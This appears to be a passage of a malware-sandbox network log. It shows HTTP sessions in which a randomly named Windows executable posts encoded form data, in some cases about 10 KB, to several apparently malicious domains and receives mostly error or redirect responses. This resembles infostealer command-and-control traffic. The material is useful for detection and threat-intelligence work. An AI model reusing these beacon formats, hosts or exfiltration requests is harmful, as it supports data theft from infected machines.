q6oFWQ/D2qN1O/dI1CmhEIuN+JZJ37+SrHaBRd9YhSMQDkVL4umAcEnxzY5wET3KL5RTL+SvL8fmGy0jBJM4QiDPHABXtSNXCFlkqKlj57FqKN+L8Sxp1MPwuuEUyz+U7Q99u7U4wy56ich3wMxWPeKqzQYTXNG6G8w0TzEOSf6bhCvmzJvUThoj2ihkROZlBfPEqxL/REjAwqw/IAqZwMJhQeZePjBKI7LKhg+3JpJv7myNRIBrg5zNZMX4wfG1N278AL [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	64708	13.248.169.48	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:20.817015886 CET	466	OUT	GET /3e55/?xDq=e7cut+sq+gjH7SJUS4xdyYo0p6mJ9qAA0wzN+9ruW+EOQxiCPnXfmi7SN89EF+kZU43+kk4LMIz3TDJAmTe52w+EUUdZ4J96HyImgVvdykY8ajmm995qykg=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.egldfi.xyz User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:19:21.271946907 CET	397	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 20 Nov 2024 03:19:21 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 44 71 3d 65 37 63 75 74 2b 73 71 2b 67 6a 48 37 53 4a 55 53 34 78 64 79 59 6f 30 70 36 6d 4a 39 71 41 41 30 77 7a 4e 2b 39 72 75 57 2b 45 4f 51 78 69 43 50 6e 58 66 6d 69 37 53 4e 38 39 45 46 2b 6b 5a 55 34 33 2b 6b 6b 34 4c 4d 49 7a 33 54 44 4a 41 6d 54 65 35 32 77 2b 45 55 55 64 5a 34 4a 39 36 48 79 49 6d 67 56 76 64 79 6b 59 38 61 6a 6d 6d 39 39 35 71 79 6b 67 3d 26 4c 68 78 3d 66 50 41 68 37 68 74 48 79 46 50 6c 2d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?xDq=e7cut+sq+gjH7SJUS4xdyYo0p6mJ9qAA0wzN+9ruW+EOQxiCPnXfmi7SN89EF+kZU43+kk4LMIz3TDJAmTe52w+EUUdZ4J96HyImgVvdykY8ajmm995qykg=&Lhx=fPAh7htHyFPl-"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	64739	91.206.201.136	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:26.417035103 CET	742	OUT	POST /bnd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.betmatchx.online Origin: http://www.betmatchx.online Referer: http://www.betmatchx.online/bnd1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 7a 6f 38 6f 43 76 56 4a 70 67 55 30 35 6c 54 6d 61 4c 52 7a 50 38 35 55 4a 4f 32 65 42 45 4b 58 49 57 51 62 62 45 56 68 47 4a 68 79 6a 39 6d 68 66 48 2f 55 4d 2b 36 41 54 6a 71 77 64 38 42 67 63 73 47 56 74 36 68 65 7a 51 51 65 50 6d 36 64 4d 4d 62 35 50 79 5a 4e 54 35 50 4c 4b 70 2f 72 5a 54 35 4e 32 55 5a 62 51 7a 54 55 58 46 30 65 4a 31 36 4d 47 6a 34 69 37 4c 33 36 69 2f 63 34 35 4b 56 6b 35 51 54 4c 55 76 5a 70 56 4b 42 56 44 35 4e 34 7a 33 30 4c 67 70 67 44 5a 32 41 30 6e 46 68 38 50 66 62 64 2f 7a 7a 64 61 35 6a 30 57 30 48 78 30 58 59 31 4d 4e 51 5a 61 59 58 58 42 67 3d 3d Data Ascii: xDq=zo8oCvVJpgU05lTmaLRzP85UJO2eBEKXIWQbbEVhGJhyj9mhfH/UM+6ATjqwd8BgcsGVt6hezQQePm6dMMb5PyZNT5PLKp/rZT5N2UZbQzTUXF0eJ16MGj4i7L36i/c45KVk5QTLUvZpVKBVD5N4z30LgpgDZ2A0nFh8Pfbd/zzda5j0W0Hx0XY1MNQZaYXXBg==
Nov 20, 2024 04:19:27.111341953 CET	318	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Wed, 20 Nov 2024 03:19:26 GMT Content-Type: text/html Content-Length: 150 Connection: close x-ray: wn32694:0.000/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	64752	91.206.201.136	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:28.961478949 CET	762	OUT	POST /bnd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.betmatchx.online Origin: http://www.betmatchx.online Referer: http://www.betmatchx.online/bnd1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 7a 6f 38 6f 43 76 56 4a 70 67 55 30 36 46 6a 6d 64 63 4e 7a 4a 63 35 58 47 75 32 65 49 6b 4b 62 49 58 73 62 62 46 41 6d 42 2f 78 79 6a 66 4f 68 65 47 2f 55 41 65 36 41 47 54 71 70 5a 38 42 76 63 73 61 64 74 37 4e 65 7a 51 45 65 50 6d 71 64 4e 37 50 36 4f 69 5a 4c 49 70 50 4a 55 5a 2f 72 5a 54 35 4e 32 55 4e 39 51 7a 4c 55 58 30 45 65 49 57 69 4c 4f 44 34 68 38 4c 33 36 6f 76 63 38 35 4b 56 57 35 53 6e 74 55 74 68 70 56 50 39 56 4e 4d 35 37 35 33 30 4e 39 5a 68 6b 52 6d 64 7a 72 58 49 66 4f 39 48 43 33 33 6e 58 66 2f 75 75 48 46 6d 6d 6d 58 38 47 52 4b 5a 74 58 62 71 65 61 6f 4a 32 77 53 2f 73 43 51 74 6b 77 76 38 47 42 4d 4e 58 55 43 77 3d Data Ascii: xDq=zo8oCvVJpgU06FjmdcNzJc5XGu2eIkKbIXsbbFAmB/xyjfOheG/UAe6AGTqpZ8Bvcsadt7NezQEePmqdN7P6OiZLIpPJUZ/rZT5N2UN9QzLUX0EeIWiLOD4h8L36ovc85KVW5SntUthpVP9VNM57530N9ZhkRmdzrXIfO9HC33nXf/uuHFmmmX8GRKZtXbqeaoJ2wS/sCQtkwv8GBMNXUCw=
Nov 20, 2024 04:19:29.666461945 CET	318	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Wed, 20 Nov 2024 03:19:29 GMT Content-Type: text/html Content-Length: 150 Connection: close x-ray: wn32694:0.000/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	64771	91.206.201.136	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:31.505898952 CET	10844	OUT	POST /bnd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.betmatchx.online Origin: http://www.betmatchx.online Referer: http://www.betmatchx.online/bnd1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 7a 6f 38 6f 43 76 56 4a 70 67 55 30 36 46 6a 6d 64 63 4e 7a 4a 63 35 58 47 75 32 65 49 6b 4b 62 49 58 73 62 62 46 41 6d 42 2f 35 79 67 73 32 68 66 6c 6e 55 44 65 36 41 48 54 71 73 5a 38 42 79 63 73 43 5a 74 36 78 67 7a 54 38 65 4f 41 6d 64 45 71 50 36 48 69 5a 4c 42 4a 50 4d 4b 70 2f 45 5a 54 4a 4a 32 55 64 39 51 7a 4c 55 58 33 73 65 4d 46 36 4c 44 6a 34 69 37 4c 33 32 69 2f 63 55 35 4b 4d 6a 35 53 6a 62 56 64 42 70 57 76 4e 56 50 2b 52 37 31 33 30 50 38 5a 68 38 52 6d 52 38 72 58 55 70 4f 38 7a 6b 33 77 50 58 54 36 48 54 55 32 4b 72 77 30 59 31 4b 6f 68 36 51 5a 69 5a 65 72 46 70 33 68 6d 33 65 55 74 55 79 38 70 69 47 38 4a 67 44 6c 43 45 72 6b 6f 73 74 53 56 38 58 4a 49 54 33 2b 74 48 37 68 66 52 32 72 65 50 61 48 56 49 51 79 47 4e 32 6c 79 6a 6b 49 69 48 6b 57 62 56 45 61 30 38 53 34 7a 4d 4b 4c 71 63 38 65 33 68 4e 34 57 53 41 6e 75 75 78 42 56 57 79 59 4f 56 69 6d 4c 63 66 63 4f 69 45 50 54 37 41 65 4a 42 34 75 6f 62 62 52 38 45 4b 51 51 4d 56 67 6d 44 6e 31 37 49 56 73 2f 5a 39 46 [TRUNCATED] Data Ascii: xDq=zo8oCvVJpgU06FjmdcNzJc5XGu2eIkKbIXsbbFAmB/5ygs2hflnUDe6AHTqsZ8BycsCZt6xgzT8eOAmdEqP6HiZLBJPMKp/EZTJJ2Ud9QzLUX3seMF6LDj4i7L32i/cU5KMj5SjbVdBpWvNVP+R7130P8Zh8RmR8rXUpO8zk3wPXT6HTU2Krw0Y1Koh6QZiZerFp3hm3eUtUy8piG8JgDlCErkostSV8XJIT3+tH7hfR2rePaHVIQyGN2lyjkIiHkWbVEa08S4zMKLqc8e3hN4WSAnuuxBVWyYOVimLcfcOiEPT7AeJB4uobbR8EKQQMVgmDn17IVs/Z9Fi3s8zL85VsLOvcGwTbWQQL4HQHWyQKpiYTtRT+cb1LljbwhKpKbsWup8ICY37LUdw41zOgfWW9l8ep050EqF0yC72zEuLtIvUrmd9zgvcqP+E8i7y0+6UpMa4/RCl6cvnrOxqngK7PfwlJxJCzpz+K8F11fku2Qn3AAiaLy++PYRacOjZwnYy5EgyiPCtF6xvDg9GMNGBA0I/j96C33P2K6WqiSIRlEj28pQwDfSl9d+oopdGyG6mEnxrbqE5JzDC4gN++xW9tqmqDabizLh5bs5vPdGTDHWxKRgjctjzO+VVf2E1dBe41nmLSi4ClZwjxVCFMAKgg2KxFGXZVv/KkpN6OrMSGc1tq8KlvDp/+GLF8ADrIKpM+1NXghVGzvwvDxrVKFcv8UBYyUOxJqJsJv9VyKY+OZ5MkvWcsp6EVE8hq9ozSEFCNX6H/6sFkoUR7FX3KiRcRBfBE59RafZ7m0VJatkmsve4dnCBhMzdg9ZlhG+vaOkRK5kSnVE0fGo0AAjOaypKztHlKIk0MAew0fgXF/2DZPzjEu9/HjPTYdyAxtcduEIwnevV3phZPtPGms1krMZ4k/Di+oRqaZYWWwQqAnzE2xDjwM7+gf2Q0qp2HPeQ8JFwWLn1Br31VEBkm83OLbIMpAkRl5Jwy7ms2gaALrBrb2+gw [TRUNCATED]
Nov 20, 2024 04:19:32.197645903 CET	318	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Wed, 20 Nov 2024 03:19:32 GMT Content-Type: text/html Content-Length: 150 Connection: close x-ray: wn32694:0.000/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	64789	91.206.201.136	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:34.049609900 CET	472	OUT	GET /bnd1/?xDq=+qUIBb8n1ABDtnrHN8NtG8V6LcaZfiG0FDsVLWxlL8URstOMchGUJI+QLzGyTcFWCZ2pjKgvok0jKnOQP4P3BCUAJ4DrLeDFBH9H9m1GLjfoWl8bX0C0KxM=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.betmatchx.online User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:19:34.744930029 CET	1082	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:19:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ray: wn32694:0.010/wa32694:D=1591 Data Raw: 33 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 54 49 54 4c 45 3e 53 69 74 65 20 62 65 74 6d 61 74 63 68 78 2e 6f 6e 6c 69 6e 65 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 3c 2f 54 49 54 4c 45 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 3a 20 31 32 70 78 20 54 61 68 6f 6d 61 3b 7d 0a 09 09 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 63 6f 6c 6f 72 3a 23 31 46 38 34 46 46 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 66 6f 6e 74 2d 77 65 [TRUNCATED] Data Ascii: 364<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /><TITLE>Site betmatchx.online not configured</TITLE><style>body {margin:0;padding:0;font: 12px Tahoma;}h1 {font-size:20px;color:#1F84FF;margin-bottom:20px;margin-top:0;font-weight:normal;line-height:30px;}a {color:#1873b4;}div {width: 700px;margin: 100px auto 0 auto;padding-top: 50px;height: 120px;line-height: 150%;}</style></head><body><div><h1>Site betmatchx.online not configured</h1>To get your site here, you need to add it to <a rel='nofollow' href='https://adm.tools/?page=5'>control panel</a>in the «My Sites» section.<br><br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.<br><br></div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	64827	38.47.232.202	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:40.319245100 CET	721	OUT	POST /bsyy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/bsyy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 50 6c 55 34 79 33 69 4a 59 4b 51 42 54 75 74 6b 79 45 77 34 6f 48 62 45 45 71 74 57 4d 69 56 38 64 4f 73 52 31 39 75 6f 4d 4b 70 43 75 66 70 59 45 48 54 69 79 41 4f 72 4d 76 5a 65 57 44 77 34 6a 61 52 73 37 48 54 67 7a 53 61 52 36 6c 37 54 38 71 39 6e 2b 57 7a 5a 35 76 44 51 30 6d 53 72 65 49 42 6d 55 6b 34 4e 46 41 68 71 7a 57 67 7a 69 44 78 58 45 52 30 74 55 54 4b 34 4f 50 30 4d 2f 36 37 63 77 7a 4f 43 6e 66 2f 36 7a 34 5a 4b 6f 70 78 45 48 44 6e 61 71 74 47 52 6b 56 59 4b 31 72 37 63 2b 41 6e 67 39 57 36 2b 74 31 44 64 5a 48 4a 4b 67 67 3d 3d Data Ascii: xDq=9/+MxePuBp2hPlU4y3iJYKQBTutkyEw4oHbEEqtWMiV8dOsR19uoMKpCufpYEHTiyAOrMvZeWDw4jaRs7HTgzSaR6l7T8q9n+WzZ5vDQ0mSreIBmUk4NFAhqzWgziDxXER0tUTK4OP0M/67cwzOCnf/6z4ZKopxEHDnaqtGRkVYK1r7c+Ang9W6+t1DdZHJKgg==
Nov 20, 2024 04:19:41.027597904 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:19:40 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	64837	38.47.232.202	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:42.881886959 CET	741	OUT	POST /bsyy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/bsyy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 6c 38 65 75 38 52 32 38 75 6f 4c 4b 70 43 68 2f 70 6e 4b 6e 54 72 79 41 44 63 4d 76 31 65 57 48 59 34 6a 66 74 73 6e 6c 37 6a 68 79 61 66 38 6c 37 52 68 36 39 6e 2b 57 7a 5a 35 76 57 31 30 6d 61 72 65 34 52 6d 56 46 34 4b 49 67 68 74 32 57 67 7a 6d 44 78 54 45 52 30 44 55 58 43 57 4f 4b 77 4d 2f 37 72 63 31 79 4f 46 74 66 2f 67 38 59 59 2f 68 73 6f 41 47 44 69 51 30 4f 36 42 73 32 31 74 77 74 32 47 76 78 47 33 76 57 65 4e 77 79 4b 70 55 45 30 44 37 72 6a 49 70 67 4c 4a 51 58 35 63 36 47 65 43 55 78 33 64 31 49 73 3d Data Ascii: xDq=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3l8eu8R28uoLKpCh/pnKnTryADcMv1eWHY4jftsnl7jhyaf8l7Rh69n+WzZ5vW10mare4RmVF4KIght2WgzmDxTER0DUXCWOKwM/7rc1yOFtf/g8YY/hsoAGDiQ0O6Bs21twt2GvxG3vWeNwyKpUE0D7rjIpgLJQX5c6GeCUx3d1Is=
Nov 20, 2024 04:19:43.774146080 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:19:43 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	64838	38.47.232.202	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:45.438606024 CET	10823	OUT	POST /bsyy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/bsyy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 74 38 64 64 6b 52 30 66 47 6f 4b 4b 70 43 6f 66 70 63 4b 6e 53 37 79 44 7a 59 4d 76 70 6f 57 42 63 34 69 35 35 73 72 45 37 6a 72 79 61 66 78 46 37 53 38 71 38 6a 2b 58 66 64 35 76 47 31 30 6d 61 72 65 36 5a 6d 57 55 34 4b 62 77 68 71 7a 57 67 33 69 44 78 33 45 52 38 31 55 58 48 6a 4e 35 34 4d 2f 61 62 63 33 67 6d 46 68 66 2f 2b 39 59 59 6e 68 73 73 50 47 44 2b 79 30 50 4f 72 73 31 70 74 78 35 54 35 7a 46 65 68 31 6e 61 69 79 54 6d 70 64 57 67 34 30 73 58 53 35 56 48 69 43 69 5a 38 68 46 76 76 42 45 65 65 76 34 4e 58 47 4d 63 7a 2b 79 56 79 46 42 73 63 45 7a 56 37 69 7a 35 38 35 78 58 4d 2f 4d 6e 70 4a 2f 6e 47 30 33 55 59 54 48 7a 54 43 71 37 4c 74 67 37 41 68 71 59 2f 74 79 61 7a 51 75 62 52 4e 77 6d 63 66 37 68 72 4c 69 5a 71 4d 58 69 32 61 72 56 56 63 73 73 74 34 51 76 42 6e 35 35 33 7a 6d 2b 5a 51 61 52 34 37 4d 67 34 57 58 75 34 4c 42 6b 44 58 4a 68 43 39 5a [TRUNCATED] Data Ascii: xDq=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3t8ddkR0fGoKKpCofpcKnS7yDzYMvpoWBc4i55srE7jryafxF7S8q8j+Xfd5vG10mare6ZmWU4KbwhqzWg3iDx3ER81UXHjN54M/abc3gmFhf/+9YYnhssPGD+y0POrs1ptx5T5zFeh1naiyTmpdWg40sXS5VHiCiZ8hFvvBEeev4NXGMcz+yVyFBscEzV7iz585xXM/MnpJ/nG03UYTHzTCq7Ltg7AhqY/tyazQubRNwmcf7hrLiZqMXi2arVVcsst4QvBn553zm+ZQaR47Mg4WXu4LBkDXJhC9Z/wWt6COd6QCUo11hrnn9WQcytEQgsmQ7Y5i16GBira4R21PK4Df7jqWaMLoQIcBwYOQtkfHDrqVfbTIcDG5fHgZEPgZaAAjCaugiULTfeWbYcAqHPY1MZUSm+kjM+Eg8znthMGyhG8liUHUPO8zr3ftdX8KPuBASGY7GZ4OeOm4WwLqs7/rbdXCT/96fAAuopW8nNXQjrgMzB76dCWbnl/qnEIcUf4wvlyyE2ekfKY2e76UcCSay2j+KUQZDCN0bIheL3L5u1XuuiecCZfSRvwPx0j3VW8pqcqymGYR1ANNMkF6cG7Sv44OZknnb6IZkVgeilaLILuZw8GzvLBEaVHZcE61hOBVCcPrvAUA3tLKrZTCJITK